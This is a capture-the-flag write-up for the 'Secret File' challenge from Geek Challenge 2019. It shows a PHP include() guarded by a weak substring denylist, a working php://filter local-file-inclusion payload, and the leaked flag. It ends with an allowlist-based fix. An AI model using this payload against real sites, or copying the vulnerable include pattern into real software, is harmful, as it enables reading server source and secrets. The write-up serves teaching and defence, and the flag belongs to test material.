[极客大挑战 2019 (Geek Challenge 2019)] Secret File
View the page source:
<a id="master" href="./Archive_room.php" style="background-color:#000000;height:70px;width:200px;color:black;left:44%;cursor:default;">Oh! You found me</a>
Clicking it takes us to ./Archive_room.php
Clicking "secret" triggers a redirect.
Go back to that page and capture the request with a proxy:
HTTP/1.1 302 Found
Server: openresty
Date: Wed, 24 Feb 2021 08:46:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Location: end.php
X-Powered-By: PHP/7.3.11
Content-Length: 63
<!DOCTYPE html>
<html>
<!--
secr3t.php
-->
</html>
The response is a redirect, and the HTML comment in its body reveals secr3t.php.
Open secr3t.php:
<?php
highlight_file(__FILE__);
error_reporting(0);
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
    echo "Oh no!";
    exit();
}
include($file);
//the flag is in flag.php
?>
The blocklist rejects "../", "tp", "input" and "data" (case-insensitively), which blocks directory traversal, the php://input and data:// wrappers, and anything containing "tp" (including "http"). It does not block the php://filter wrapper, so we can read flag.php as base64 instead of executing it.
Payload:
secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php
Base64-decoding the output gives:
<?php
echo "我就在这里";
$flag = 'flag{c09a95d6-8ff9-4c3f-be29-20c8f10d75de}';
$secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
?>
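The root cause is a denylist on user-controlled include paths: "php://filter/..." contains none of the banned substrings, so the check passes. As an added example (not part of the challenge or this writeup), here is the same check side by side with an allowlist-based replacement; the page list and the pages/ directory are assumptions for illustration.

```php
<?php
// Original denylist from secr3t.php, kept only for comparison.
function denylist_allows(string $file): bool {
    return !(strstr($file, "../") || stristr($file, "tp")
          || stristr($file, "input") || stristr($file, "data"));
}

// Hardened replacement: only a fixed set of bare page names is accepted,
// so stream wrappers (php://, data://, http://) and traversal never reach
// include(). The allowlist and base directory are assumed for this example.
function safe_include(string $file): void {
    $allowed = ['index.php', 'Archive_room.php', 'end.php']; // assumed
    $baseDir = realpath(__DIR__ . '/pages');                  // assumed

    if (!in_array($file, $allowed, true)) {
        http_response_code(404);
        exit('Not found');
    }
    // Defence in depth: resolve the final path and confirm it is still
    // inside $baseDir even if the allowlist is edited carelessly later.
    $path = realpath($baseDir . '/' . $file);
    $prefix = $baseDir . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        http_response_code(404);
        exit('Not found');
    }
    include $path;
}

// The challenge payload slips through the denylist but not the allowlist.
$payload = 'php://filter/read=convert.base64-encode/resource=flag.php';
var_dump(denylist_allows($payload));                                   // bool(true)
var_dump(in_array($payload, ['index.php', 'Archive_room.php', 'end.php'], true)); // bool(false)
```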